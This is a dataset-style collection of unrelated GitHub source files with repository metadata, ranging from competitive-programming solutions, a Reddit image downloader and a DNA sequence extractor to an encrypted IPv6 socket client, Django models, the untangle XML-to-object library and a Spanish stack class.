sainad2222/my_cp_codes | 15,736,760,179,858 | bc4d2b56b063197d9c4e1b61a7d604a977f6a4d4 | dfcadafb9b7aee820a6eebba7b67dc31c0cabda5 | /codeforces/233/A.py | 778e10fff806c8a80f6802a593e85d0dd7bb34e0 | []
| no_license | https://github.com/sainad2222/my_cp_codes | 0b631872e96ff84897dd498caf4a6ed5ba4f9c15 | 4621a2b6d80ea5dc36401481bba58096192e0822 | refs/heads/master | 2023-02-15T20:42:03.524179 | 2021-01-12T09:14:00 | 2021-01-15T07:45:41 | 324,394,919 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | n = int(input())
if n & 1:
    # odd n cannot be split into pairs
    print(-1)
else:
    # print swapped neighbour pairs: 2 1 4 3 ... n n-1
    for i in range(n//2):
        print(2*(i+1), 2*(i+1)-1, end=" ") | UTF-8 | Python | false | false | 117 | py | 375 | A.py | 372 | 0.435897 | 0.367521 | 0 | 6 | 17.833333 | 40 |
CharlieCorner/pymage_downloader | 6,863,357,757,017 | bc86229237d294dc0b98a8c1b3c3394e60e3f916 | 8599d454d4deb84648a6695afd2bf700ffcaa7cf | /downloaders/reddit_downloader.py | 7fcb2a1cb9b8957aa2d4ad5be13f4bc9f99dd4d7 | [
"Apache-2.0"
]
| permissive | https://github.com/CharlieCorner/pymage_downloader | c3516e155e65c3828570ebcdd389108d71b73d65 | 797cac0afffc235aa966c88342fe378b964b5ed9 | refs/heads/master | 2023-05-27T20:38:24.505796 | 2023-05-23T17:45:19 | 2023-05-23T17:45:19 | 97,399,927 | 0 | 0 | Apache-2.0 | false | 2023-05-23T17:45:20 | 2017-07-16T17:41:02 | 2020-12-14T04:58:41 | 2023-05-23T17:45:19 | 53 | 0 | 0 | 6 | Python | false | false | import glob
import logging
import os
from argparse import Namespace
import praw
from downloaders.downloader import Downloader
from exceptions.pymage_exceptions import NotAbleToDownloadException
from parsers.parser_factory import ParserFactory
from utils.utils import download_images
LOGGER = logging.getLogger(__name__)
class RedditDownloader(Downloader):
REDDIT_FILE_PATTERN = "reddit_*_%s_*"
def __init__(self):
super().__init__(RedditDownloader.REDDIT_FILE_PATTERN)
def download(self, args: Namespace):
if args.reddit_mode == "user":
r = praw.Reddit(username=args.user, password=args.password)
else:
r = praw.Reddit()
start_from = args.start_from
for page in range(0, args.page_limit):
LOGGER.info("Starting getting posts from page %s" % start_from)
submissions = self._get_submissions(r, args, start_from)
self._process_posts(submissions, args)
next_page = submissions.params["after"]
            # We might get the same next_page as start_from if the next listing
            # has fewer than 25 posts (PRAW's default page size)
            if not next_page or next_page == start_from:
LOGGER.info("No more posts to fetch.")
break
start_from = next_page
def _get_submissions(self, reddit, args, start_from=None):
params = {"after": start_from}
if args.reddit_mode == "user":
if args.should_get_upvoted:
submissions = reddit.redditor(args.user).upvoted(limit=args.limit, params=params)
else:
submissions = reddit.redditor(args.user).saved(limit=args.limit, params=params)
else:
subreddit = reddit.subreddit(args.subreddit if isinstance(args.subreddit, str) else "+".join(args.subreddit))
if args.type == "controversial":
submissions = subreddit.controversial(time_filter=args.period, limit=args.limit, params=params)
elif args.type == "new":
submissions = subreddit.new(limit=args.limit, params=params)
elif args.type == "top":
submissions = subreddit.top(time_filter=args.period, limit=args.limit, params=params)
else:
submissions = subreddit.hot(limit=args.limit, params=params)
return submissions
def _process_posts(self, submissions, args):
for post in submissions:
if not isinstance(post, praw.models.Submission) or post.is_self:
LOGGER.info("Skipping post %s as it is not a submission or is a self post..." % post.id)
continue
LOGGER.debug("Post domain: %s" % post.domain)
pattern_to_search = os.path.join(args.folder, (self.filename_pattern % post.id))
LOGGER.debug("Pattern to search: %s" % pattern_to_search)
if not args.should_overwrite and len(glob.glob(pattern_to_search)) > 0:
LOGGER.info("Skipping post %s, we already have its images..." % post.id)
continue
parser = ParserFactory.get_parser(post.url, args)
if not parser:
continue
try:
images = parser.get_images(post)
download_images(images, args.folder)
except NotAbleToDownloadException as e:
LOGGER.error(e)
LOGGER.info("The next post ID is: %s" % submissions.params['after'])
| UTF-8 | Python | false | false | 3,530 | py | 22 | reddit_downloader.py | 19 | 0.613314 | 0.612181 | 0 | 93 | 36.956989 | 121 |
greatabel/PythonRepository | 19,292,993,102,808 | 74258dbd1674fa955c347fa60ea1c4aecd951dfe | 52585c8d95cef15199c18ba1a76899d2c31329f0 | /05PythonCookbook/ch10ModulesAndPackages/i1graphics/primitive/line.py | bdf1a8a1c5a0a9cf408976d0581c424538e85b21 | []
| no_license | https://github.com/greatabel/PythonRepository | c7a952257303a21083ed7d535274c339362bd126 | 836fcdd3f5c1b150122302685104fe51b5ebe1a3 | refs/heads/master | 2023-08-30T15:56:05.376391 | 2023-08-26T03:34:14 | 2023-08-26T03:34:14 | 29,392,599 | 33 | 6 | null | false | 2023-02-14T13:33:21 | 2015-01-17T13:54:58 | 2022-10-31T09:32:22 | 2023-02-14T13:33:20 | 76,526 | 23 | 7 | 9 | Python | false | false | print('I am line.py') | UTF-8 | Python | false | false | 21 | py | 895 | line.py | 620 | 0.666667 | 0.666667 | 0 | 1 | 21 | 21 |
duanzhihua/StudyNote | 11,562,051,998,466 | 9aef358d6208dc7931a5e9f7ea895f39a7b468df | 28a901654360df732be05106a5a7435399b41438 | /pythonWebCrawler/ArticleSpider/main.py | 12cc1829cc9e4058fc35b81205d963ddf5af3971 | []
| no_license | https://github.com/duanzhihua/StudyNote | 39879a9c8c526df0017f12e0d31ebba91d77cec8 | 1e6532a1f5ff5b401bceadf4ec46b3b7e7505668 | refs/heads/master | 2021-09-09T16:32:28.306324 | 2018-03-18T02:26:09 | 2018-03-18T02:26:09 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from scrapy.cmdline import execute
import sys
import os
def main():
print(os.path.abspath(__file__))
print(os.path.dirname(os.path.abspath(__file__)))
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
execute(['scrapy','crawl','jobbole'])
if __name__=='__main__':
main() | UTF-8 | Python | false | false | 300 | py | 179 | main.py | 91 | 0.643333 | 0.643333 | 0 | 10 | 29.1 | 63 |
nwhitehead1/multithreaded-python-sockets | 13,443,247,660,430 | f6c34241dbe651f5b1276859dcff51680656ffd5 | a799b8f0fb8b00ecd31b6170b76ef725c5dece27 | /client.py | 9f054d5805e39498c14f688d93348035e9a9cf59 | []
| no_license | https://github.com/nwhitehead1/multithreaded-python-sockets | 1081070496bb145d59b35906e75d06213c8a4856 | 4a702bad8c56f90cceb057b169a7cd6a70b3543d | refs/heads/master | 2023-08-18T12:04:49.340473 | 2021-10-17T17:05:04 | 2021-10-17T17:05:04 | 213,256,977 | 2 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python3
import socket
import sys
import crypto
BUFFER_SIZE = 1024
# File Not Found -> Throw this to end execution on empty server send.
class FileNotFoundException(Exception):
pass
def main():
HOST = sys.argv[1] # Server IP address
PORT = int(sys.argv[2]) # Port used by the server
#HOST = "fd41:c6b6:6e7c:0:b509:1591:9285:587d"
#PORT = 7777
print('[CLIENT] Creating socket...')
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM, 0)
s.connect((HOST, PORT, 0, 0))
print('[CLIENT] Connecting to server:', HOST, ' (', PORT, ')')
clientPrivateKey, clientPublicKey = crypto.keyGen()
# Receive public key from server
try:
serverPublicKeyString = s.recv(BUFFER_SIZE).decode('utf-8')
serverPublicKey = crypto.stringToKey(serverPublicKeyString)
    except ValueError as ve:
        print('[CLIENT] Invalid public key from server:', ve)
        s.close()
        return  # cannot continue without a valid server key
# Send public key to server
print('[CLIENT] Sending Public Key:\n', crypto.keyToBytes(clientPublicKey))
s.sendall(crypto.keyToBytes(clientPublicKey))
try:
# Request String
byteRequestString = input('[CLIENT] File Name Request: ').encode()
encryptedByteRequestString = crypto.encrypt(byteRequestString, serverPublicKey)
print('[CLIENT] Sending encrypted request:', encryptedByteRequestString)
s.sendall(encryptedByteRequestString)
# Response File
encryptedResponseFile = s.recv(BUFFER_SIZE)
if not encryptedResponseFile:
raise FileNotFoundException()
else:
print('[CLIENT] Receiving encrypted server response:', encryptedResponseFile)
print('[CLIENT] Response received. Writing data to local file...')
try:
decryptedResponseFile = crypto.decrypt(encryptedResponseFile, clientPrivateKey)
f = open('responses/response_file.txt', 'wb')
f.write(decryptedResponseFile)
if f:
f.close()
except:
print('[CLIENT] Unable to write response to file!')
except KeyboardInterrupt:
print('[CLIENT] Closing client socket...')
except FileNotFoundException:
print('[CLIENT] Response not received: The file could not be found.')
finally:
s.close()
if __name__ == '__main__':
main()
| UTF-8 | Python | false | false | 2,384 | py | 4 | client.py | 3 | 0.641359 | 0.625839 | 0 | 64 | 36.25 | 95 |
marekborowiec/seq_extractor | 7,249,904,803,251 | 7720131eceaa7298f10cfa61a9239a89e6ec6ca0 | 63f55805b743cd72a3cd4b27c5c5d312ffd4f703 | /seq_extractor.py | 9eae13459d89424b613d87a1f1ae222792ba8cdc | []
| no_license | https://github.com/marekborowiec/seq_extractor | 2b0b6b469c83d2b23ec657c5a11ef1ed2f20e6a2 | aac82025ffc1c67b9dd58271c60be7bba43badd7 | refs/heads/master | 2015-08-09T07:57:06 | 2014-01-07T20:04:50 | 2014-01-07T20:04:50 | 13,912,553 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #! /usr/bin/env python
# seq_extractor.py by Marek Borowiec
# This program reads a multiple sequence alignment (so far only NEXUS supported) and extracts a partition given by user
import sys
from sys import argv
import re
# Throwing an error if no input file is provided
if len(sys.argv) < 2:
print "Use: seq_splitter.py your_filename.extension"
sys.exit()
else:
script, input_file = argv
prompt = "> "
print """Do you wish to extract from all or a particular sequence/taxon?
(options: all/your_taxon_name as in the input file)"""
choose = raw_input(prompt)
print """\nWhat partition do you wish to extract?
Enter range as two integers, for example Start: 1, Stop: 678
Start:"""
first = raw_input(prompt)
start = int(first) - 1
print "Stop:"
last = raw_input(prompt)
stop = int(last)  # inclusive end position, so the slice below keeps the last base
# Defining nchar for the NEXUS block
nchar = stop - start
print """Write a NEXUS block? (y/n)"""
nexus = raw_input(prompt)
current_file = open(input_file, 'r')
file_read = current_file.readlines()
# Defining output file name if all taxa are extracted
if choose == 'all':
output_file_name = str(first) + '-' + str(last) + '_' + str(input_file)
# Output file name will be prefixed with the taxon name if only one chosen
else:
output_file_name = choose + "_" + str(first) + '-' + str(last) + '_' + str(input_file)
# Gives the option to write to a file or just print to screen
write_output = True
if write_output:
output = open(output_file_name, 'w')
if nexus == 'y':
# Prompts to provide ntax for NEXUS block
if choose == 'all':
print "Number of taxa?"
ntax = int(raw_input(prompt))
# Only one taxon if a name is specified
else:
ntax = 1
# Providing the beginning of NEXUS block
nexus_block_begin = """#NEXUS
Begin data;
Dimensions ntax=%d nchar=%d;
Format datatype=dna symbols="ACTG" missing=? gap=-;
Matrix""" % (ntax, nchar)
# Providing the end of NEXUS block
nexus_block_end = """;
End;"""
if write_output:
output.write(nexus_block_begin + '\n')
line_number = 0
for line in file_read:
# Defining a regex that matches strings with
# taxa and sequences
tax_seq_pattern = '(^|\t)(\S+\s+)([ACGTKMRYSWNBVHD?-]+)(\s|\r\n?|\n)'
# Defining a regex that matches strings with
# chosen taxon and its sequence
chosen_seq_pattern = '(^|\t)(%s\s+)([ACGTKMRYSWNBVHD?-]+)(\s|\r\n?|\n)' % choose
# This will match all taxa and sequence lines
result = re.search(tax_seq_pattern, line)
# This will match only chosen taxon line
taxon_result = re.search(chosen_seq_pattern, line)
if result:
# Getting taxon name and sequence from
# the matched string
taxon = result.group(2)
sequence = result.group(3)
# Defining partition
partition = sequence[start:stop]
# Defining output string
out_string = "%s %s" % (taxon, partition)
if write_output:
if choose == "all":
output.write(out_string + '\n')
else:
if taxon_result:
output.write(out_string + '\n')
line_number += 1
if nexus == 'y':
if write_output:
output.write(nexus_block_end)
print "\nYour file with extracted sequences has been saved as %r\n" % (output_file_name)
current_file.close()
if write_output:
output.close()
| UTF-8 | Python | false | false | 3,179 | py | 2 | seq_extractor.py | 2 | 0.677257 | 0.673482 | 0 | 133 | 22.902256 | 119 |
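A quick, self-contained check of the taxon/sequence regex used above (the sample line is made up):

```python
# The pattern captures a taxon label followed by an IUPAC sequence string.
import re

tax_seq_pattern = r'(^|\t)(\S+\s+)([ACGTKMRYSWNBVHD?-]+)(\s|\r\n?|\n)'
line = "Taxon_A    ACGT-ACGTNN\n"
m = re.search(tax_seq_pattern, line)
print(m.group(2).strip(), m.group(3))   # Taxon_A ACGT-ACGTNN
```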
hamishesham/Companion | 2,233,383,012,766 | 6f008f1fb2eef0b0d1e811644b50cbed10255741 | 6a4c85f492e65b9a67f56ec5ca6a4b5fc59f1e16 | /output.py | 59f8e1ea5590882e68854682f10c4a05222ba0ea | []
| no_license | https://github.com/hamishesham/Companion | e21ea9a64aeb0070c2bec4ff84c0faf8ce8e070a | 80ebfa78ac7e4d39b9a8bfac2e9d7801497bbae4 | refs/heads/master | 2020-03-29T20:07:10.312805 | 2018-09-23T16:39:59 | 2018-09-23T16:39:59 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | TRAIN_DATA = [
('we are meeting ten thirty a m today', {'entities':[(15, 29, 'TIME'),(30, 35, 'DATE'),]}),
('the boys will meet nine fifty a m tomorrow', {'entities':[(19, 33, 'TIME'),(34, 42, 'DATE'),]}),
('they will be there by one twenty a m', {'entities':[(22, 36, 'TIME'),]}),
] | UTF-8 | Python | false | false | 286 | py | 10 | output.py | 7 | 0.56993 | 0.5 | 0 | 5 | 56.4 | 99 |
jaydee220/PCSII_Sapienza | 3,934,190,071,849 | bf8e23a302376df1102b424422f3a52ae8294667 | f19664bda4bb0fd5d6427ceffeec941ec172af14 | /Ex12.py | d586181dd3c57771317bac7a4cef8b1fce335ab3 | []
| no_license | https://github.com/jaydee220/PCSII_Sapienza | 44b5212a8932fbc9882fc3183cdc4b5b6965b4e1 | 198906ff69c5bc9103c449c71cc70c2b5e6d0f3d | refs/heads/master | 2021-07-21T08:47:28.535596 | 2017-10-31T09:34:32 | 2017-10-31T09:34:32 | 107,376,613 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | classgrades= []
if __name__ == '__main__':
for _ in range(int(input())):
names = input()
scores = float(input())
classgrades.append([names,scores])
gradesonly = list(set(scores for names,scores in classgrades))
gradesonly.sort()
names_lst = list(names for names,scores in classgrades if scores == gradesonly[1])
names_lst.sort()
for name in names_lst:
print (name)
| UTF-8 | Python | false | false | 421 | py | 44 | Ex12.py | 43 | 0.612827 | 0.610451 | 0 | 12 | 34.083333 | 86 |
vanslar/ecggenerator | 14,164,802,156,999 | a7a4819aa9aa0c7218040b9266278f3894ffcd93 | 8df9a0bc66bb63d8d2c31d7dbf04859470cc4b89 | /genEcg.py | db97dd02fd07fc29a9f93f32b8fdffceb372c404 | []
| no_license | https://github.com/vanslar/ecggenerator | b00607b076980baa2ee9155d7fa3f109b7413cde | adc8701105271b465baf7481ca4c84859f656215 | refs/heads/master | 2020-06-05T06:32:36.103693 | 2019-06-21T11:38:02 | 2019-06-21T11:38:02 | 192,346,078 | 3 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python
#import modelCharRnn
import modelV3 as model
import wfdb
import tensorflow as tf
import matplotlib.pyplot as plt
sig, field = wfdb.rdsamp('Data/1201_5')
#data = sig[:, 0]
data = sig[:, 0]
pre_data = data[18750:18750+1000]
batch_count = 1
#seq_length = field['fs']*3
seq_length = field['fs']*2
feature_length = field['fs']*2
#Model = model.EcgGenerator_CharRnn(128, 2, batch_count, seq_length, 0.001, 0.5)
#Model = model.EcgGenerator(128, 2, batch_count, seq_length, 0.001, 0.5, 1000)
Model = model.EcgGenerator(128,feature_length, 2, batch_count, seq_length, 0.001, 0.5, 1)
Model.load(tf.train.latest_checkpoint('./models'))
result = Model.eval(10000, pre_data)
with open('result.txt', 'w') as fid:
for i in result:
fid.write(str(i)+'\n')
plt.plot(result)
plt.show() | UTF-8 | Python | false | false | 801 | py | 5 | genEcg.py | 4 | 0.689139 | 0.606742 | 0 | 29 | 26.655172 | 89 |
zhuoxiaojian/SemSupport | 13,125,420,094,266 | c5c4b599f9fff00125c54cc7cb2a7ee3b3b35869 | 0a94e12fc91815bdf510d748f37fdfccabe8c9d4 | /apps/citys/models.py | 71a911d9f579a5eeb0771ebec775179d0f2355b7 | []
| no_license | https://github.com/zhuoxiaojian/SemSupport | 0cb47e2612373b90e4a6b95165bc39d49a9bd0ac | 4dd4582c03daf43b589298c6061846d40aa3666f | refs/heads/master | 2022-12-23T15:18:35.411711 | 2019-09-26T12:16:08 | 2019-09-26T12:16:08 | 129,690,135 | 1 | 0 | null | false | 2022-12-07T23:51:23 | 2018-04-16T05:38:27 | 2020-07-30T12:51:39 | 2022-12-07T23:51:21 | 5,004 | 0 | 0 | 18 | JavaScript | false | false | from django.db import models
# Create your models here.
class FormRegionCity(models.Model):
name = models.CharField(max_length=255, unique=True, verbose_name='城市')
class Meta:
db_table = 'ys_city'
verbose_name = '城市信息'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class Area(models.Model):
name = models.CharField(max_length=255, unique=True, verbose_name='地区')
class Meta:
db_table = 'ys_area_list'
verbose_name = '地区列表'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class Province(models.Model):
name = models.CharField(max_length=255, unique=True, verbose_name='省份')
area = models.ForeignKey(Area, default=None, null=True, on_delete=models.SET_NULL, verbose_name='所属地区')
class Meta:
db_table = 'ys_province_list'
verbose_name = '省份列表'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
class City(models.Model):
name = models.CharField(max_length=255, unique=True, verbose_name='城市')
province = models.ForeignKey(Province, verbose_name='所属省份', default=None, null=True, on_delete=models.SET_NULL)
class Meta:
db_table = 'ys_city_list'
verbose_name = '城市列表'
verbose_name_plural = verbose_name
def __str__(self):
return self.name
| UTF-8 | Python | false | false | 1,462 | py | 79 | models.py | 73 | 0.638054 | 0.629471 | 0 | 49 | 27.530612 | 115 |
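A hypothetical usage sketch for the models above (assumes the app is installed and migrations have been applied; all instance names are made up):

```python
# Create a linked area -> province -> city chain and follow the FKs back.
area = Area.objects.create(name='East China')
prov = Province.objects.create(name='Zhejiang', area=area)
city = City.objects.create(name='Hangzhou', province=prov)
print(city.province.area.name)   # East China
```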
Sishan/LeetCode | 1,417,339,219,433 | e3340a51ef78dddf37c0e445b9896030d7376aa3 | 4d49d1665f6f385c08f292b728da6eba563ee400 | /Easy/RemoveElement.py | 874638fd228808957e45f6c9968c5d084e734fa8 | []
| no_license | https://github.com/Sishan/LeetCode | 4ac3c10cd65e395be68e66d0cb1f26d8ac0f5ea0 | 8c2f4af2fd30ca93daca8f7007b41e1f33c8f147 | refs/heads/master | 2020-05-22T01:39:09.459822 | 2020-01-24T05:32:19 | 2020-01-24T05:32:19 | 57,013,043 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
Given an array and a value, remove all instances of that value in place and return the new length.
Do not allocate extra space for another array, you must do this in place with constant memory.
The order of elements can be changed. It doesn't matter what you leave beyond the new length.
"""
class Solution(object):
def removeElement(self, nums, val):
"""
:type nums: List[int]
:type val: int
:rtype: int
"""
        if nums is None:
            return 0
        count = 0
        for i in xrange(len(nums)):
            if nums[i] != val:
                # keep this element: write it at the next free slot
                nums[count] = nums[i]
                count += 1
        return count
| UTF-8 | Python | false | false | 694 | py | 228 | RemoveElement.py | 217 | 0.56196 | 0.557637 | 0 | 23 | 27.826087 | 98 |
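A quick check of the two-pointer overwrite above, in the same Python 2 style as the snippet (assumes `Solution` is in scope):

```python
# In-place removal: the first k slots hold the kept elements.
nums = [3, 2, 2, 3]
k = Solution().removeElement(nums, 3)
print k, nums[:k]   # 2 [2, 2]
```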
batterseapower/untangle | 7,902,739,869,091 | 45ecd6ab8cdec114739384a89805a0f641d0061b | 1504eac0717a76250379f5d2507e4d3664dc134d | /untangle.py | 31f28c56c66a3b243154a1a12a2cccf0d06596e | ["MIT"] | permissive | https://github.com/batterseapower/untangle | 81f91b1a15627e8c127f763636685b147636c78d | 0a3830a6f25f1b64044ae6f60f61c72a5a751e77 | refs/heads/master | 2021-01-22T01:10:27.435685 | 2017-09-02T14:10:24 | 2017-09-02T14:10:24 | 102,200,796 | 0 | 0 | null | true | 2017-09-02T14:07:25 | 2017-09-02T14:07:25 | 2017-08-30T08:20:43 | 2017-07-31T18:37:06 | 111 | 0 | 0 | 0 | null | null | null |
#!/usr/bin/env python
"""
untangle
Converts xml to python objects.
The only method you need to call is parse()
Partially inspired by xml2obj
(http://code.activestate.com/recipes/149368-xml2obj/)
Author: Christian Stefanescu (http://0chris.com)
License: MIT License - http://www.opensource.org/licenses/mit-license.php
"""
import os
import sys
import keyword
import errno
from xml.sax import make_parser, handler
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
try:
from types import StringTypes
def is_string(x):
return isinstance(x, StringTypes)
except ImportError:
def is_string(x):
return isinstance(x, str)
__version__ = '1.1.1'
class Element(object):
"""
Representation of an XML element.
"""
def __init__(self, name, attributes):
self._name = name
self._attributes = attributes
self.children = []
self.is_root = False
self.cdata = ''
def add_child(self, element):
"""
Store child elements.
"""
self.children.append(element)
def add_cdata(self, cdata):
"""
Store cdata
"""
self.cdata = self.cdata + cdata
def get_attribute(self, key):
"""
Get attributes by key
"""
return self._attributes.get(key)
def get_elements(self, name=None):
"""
Find a child element by name
"""
if name:
return [e for e in self.children if e._name == name]
else:
return self.children
def __getitem__(self, key):
return self.get_attribute(key)
def __getattr__(self, key):
matching_children = [x for x in self.children if x._name == key]
if matching_children:
if len(matching_children) == 1:
self.__dict__[key] = matching_children[0]
return matching_children[0]
else:
self.__dict__[key] = matching_children
return matching_children
else:
raise AttributeError(
"'%s' has no attribute '%s'" % (self._name, key)
)
    def __hasattribute__(self, name):
        if name in self.__dict__:
            return True
        # any() takes a single iterable, not a separate predicate argument
        return any(x._name == name for x in self.children)
def __iter__(self):
yield self
def __str__(self):
return (
"Element <%s> with attributes %s, children %s and cdata %s" %
(self._name, self._attributes, self.children, self.cdata)
)
def __repr__(self):
return (
"Element(name = %s, attributes = %s, cdata = %s)" %
(self._name, self._attributes, self.cdata)
)
def __nonzero__(self):
return self.is_root or self._name is not None
def __eq__(self, val):
return self.cdata == val
def __dir__(self):
children_names = [x._name for x in self.children]
return children_names
def __len__(self):
return len(self.children)
def __contains__(self, key):
return key in dir(self)
class Handler(handler.ContentHandler):
"""
SAX handler which creates the Python object structure out of ``Element``s
"""
def __init__(self):
self.root = Element(None, None)
self.root.is_root = True
self.elements = []
def startElement(self, name, attributes):
name = name.replace('-', '_')
name = name.replace('.', '_')
name = name.replace(':', '_')
# adding trailing _ for keywords
if keyword.iskeyword(name):
name += '_'
attrs = dict()
for k, v in attributes.items():
attrs[k] = v
element = Element(name, attrs)
if len(self.elements) > 0:
self.elements[-1].add_child(element)
else:
self.root.add_child(element)
self.elements.append(element)
def endElement(self, name):
self.elements.pop()
def characters(self, cdata):
self.elements[-1].add_cdata(cdata)
def parse(filename, **parser_features):
"""
Interprets the given string as a filename, URL or XML data string,
parses it and returns a Python object which represents the given
document.
Extra arguments to this function are treated as feature values to pass
to ``parser.setFeature()``. For example, ``feature_external_ges=False``
will set ``xml.sax.handler.feature_external_ges`` to False, disabling
the parser's inclusion of external general (text) entities such as DTDs.
Raises ``ValueError`` if the first argument is None / empty string.
Raises ``AttributeError`` if a requested xml.sax feature is not found in
``xml.sax.handler``.
Raises ``xml.sax.SAXParseException`` if something goes wrong
during parsing.
"""
if (filename is None or (is_string(filename) and filename.strip()) == ''):
raise ValueError('parse() takes a filename, URL or XML string')
parser = make_parser()
for feature, value in parser_features.items():
parser.setFeature(getattr(handler, feature), value)
sax_handler = Handler()
parser.setContentHandler(sax_handler)
if (is_pathname_valid(filename) and os.path.exists(filename)) or (is_string(filename) and is_url(filename)):
parser.parse(filename)
else:
if hasattr(filename, 'read'):
parser.parse(filename)
else:
parser.parse(StringIO(filename))
return sax_handler.root
# Originally based on https://stackoverflow.com/questions/9532499/check-whether-a-path-is-valid-in-python-without-creating-a-file-at-the-paths-ta/34102855#34102855
def is_pathname_valid(pathname):
'''
`True` if the passed pathname is a valid pathname for the current OS;
`False` otherwise.
'''
# If this pathname is either not a string or is but is empty, this pathname
# is invalid.
# Sadly, Python fails to provide the following magic number for us.
ERROR_INVALID_NAME = 123
'''
Windows-specific error code indicating an invalid pathname.
See Also
----------
https://msdn.microsoft.com/en-us/library/windows/desktop/ms681382%28v=vs.85%29.aspx
Official listing of all such codes.
'''
try:
if not is_string(pathname) or not pathname:
return False
# Strip this pathname's Windows-specific drive specifier (e.g., `C:\`)
# if any. Since Windows prohibits path components from containing `:`
# characters, failing to strip this `:`-suffixed prefix would
# erroneously invalidate all valid absolute Windows pathnames.
_, pathname = os.path.splitdrive(pathname)
# Directory guaranteed to exist. If the current OS is Windows, this is
# the drive to which Windows was installed (e.g., the "%HOMEDRIVE%"
# environment variable); else, the typical root directory.
root_dirname = os.environ.get('HOMEDRIVE', 'C:') \
if sys.platform == 'win32' else os.path.sep
assert os.path.isdir(root_dirname) # ...Murphy and her ironclad Law
# Append a path separator to this directory if needed.
root_dirname = root_dirname.rstrip(os.path.sep) + os.path.sep
# Test whether each path component split from this pathname is valid or
# not, ignoring non-existent and non-readable path components.
for pathname_part in pathname.split(os.path.sep):
try:
os.lstat(root_dirname + pathname_part)
# If an OS-specific exception is raised, its error code
# indicates whether this pathname is valid or not. Unless this
# is the case, this exception implies an ignorable kernel or
# filesystem complaint (e.g., path not found or inaccessible).
#
# Only the following exceptions indicate invalid pathnames:
#
# * Instances of the Windows-specific "WindowsError" class
# defining the "winerror" attribute whose value is
# "ERROR_INVALID_NAME". Under Windows, "winerror" is more
# fine-grained and hence useful than the generic "errno"
# attribute. When a too-long pathname is passed, for example,
# "errno" is "ENOENT" (i.e., no such file or directory) rather
# than "ENAMETOOLONG" (i.e., file name too long).
# * Instances of the cross-platform "OSError" class defining the
# generic "errno" attribute whose value is either:
# * Under most POSIX-compatible OSes, "ENAMETOOLONG".
# * Under some edge-case OSes (e.g., SunOS, *BSD), "ERANGE".
except OSError as exc:
if hasattr(exc, 'winerror'):
if exc.winerror == ERROR_INVALID_NAME:
return False
elif exc.errno in {errno.ENAMETOOLONG, errno.ERANGE}:
return False
except ValueError:
# Python throws its own exceptions if a path isn't valid in some cases, e.g. e.g. 'path too long for Windows':
# https://github.com/python/cpython/blob/3.6/Modules/posixmodule.c#L929
return False
# If a "TypeError" exception was raised, it almost certainly has the
# error message "embedded NUL character" indicating an invalid pathname.
except TypeError as exc:
return False
# If no exception was raised, all path components and hence this
# pathname itself are valid. (Praise be to the curmudgeonly python.)
else:
return True
# If any other exception was raised, this is an unrelated fatal issue
# (e.g., a bug). Permit this exception to unwind the call stack.
#
# Did we mention this should be shipped with Python already?
def is_url(string):
"""
Checks if the given string starts with 'http(s)'.
"""
try:
return string.startswith('http://') or string.startswith('https://')
except AttributeError:
return False
# vim: set expandtab ts=4 sw=4:
| UTF-8 | Python | false | false | 10,153 | py | 1 | untangle.py | 1 | 0.606323 | 0.599921 | 0 | 296 | 33.300676 | 163 |
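A short usage sketch of the `parse()` API above (the XML string is made up for illustration):

```python
# Children become attributes, XML attributes use item access, and text
# content lands in .cdata (see Element.__getattr__ / __getitem__ above).
doc = parse('<root><child name="x">hello</child></root>')
print(doc.root.child['name'])   # x
print(doc.root.child.cdata)     # hello
print('child' in doc.root)      # True: __contains__ checks child names
```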
chiaradinardo/algoritmos-I-FIUBA | 18,545,668,804,472 | 0c4050187026958d89c3945b3db544f23d2e49a3 | 444fa16e7463e8b5c828bbaea4ced1253cc0ed13 | /TP3/pilas_colas.py | 82d2743b93b0e9a62549f1326ac6c38bfdde2193 | []
| no_license | https://github.com/chiaradinardo/algoritmos-I-FIUBA | adb1e377918b9535ec46500fbcd20836ea470f5c | afae33a4296d2d04fde754c7363cf471bc7b45a7 | refs/heads/master | 2023-05-14T19:20:05.018533 | 2021-06-09T15:32:36 | 2021-06-09T15:32:36 | 290,336,937 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | '''
Clase del 27/10/2019.
'''
class Pila:
'''
Representa una pila con operaciones de apilar, desapilar y
verificar si está vacía.
'''
def __init__(self):
'''
Crea una pila vacía.
'''
self.items = []
def esta_vacia(self):
'''
Devuelve True si la lista está vacía, False si no.
'''
return len(self.items) == 0
def apilar(self, x):
'''
Apila un elemento en la pila.
'''
self.items.append(x)
def desapilar(self):
'''
Devuelve el elemento tope y lo elimina de la pila.
Si la pila está vacía levanta una excepción.
'''
if self.esta_vacia():
raise IndexError("La pila está vacía")
return self.items.pop()
# Este método está para simplificar las pruebas
def apilar_muchos(self, iterable):
'''
Apila todos los elementos del iterable en la pila.
'''
for elem in iterable:
self.apilar(elem)
# Este método está para simplificar las pruebas
def __str__(self):
'''
Devuelve una representación de la pila en la forma:
| e1, e2, ..., <TOPE
'''
return '| ' + ', '.join(map(str, self.items)) + ' <TOPE'
def __iter__(self):
return iter(self.items)
def ver_tope(self):
if self.esta_vacia():
raise IndexError("¡Pila vacía!")
return self.items[-1]
| UTF-8 | Python | false | false | 1,490 | py | 10 | pilas_colas.py | 5 | 0.527495 | 0.519348 | 0 | 60 | 23.533333 | 64 |
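A brief usage example of the stack above (illustrative only):

```python
# LIFO behaviour: the last element pushed is the first popped.
p = Pila()
p.apilar_muchos([1, 2, 3])
print(p)               # | 1, 2, 3 <TOPE
print(p.ver_tope())    # 3
print(p.desapilar())   # 3
print(p.esta_vacia())  # False
```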
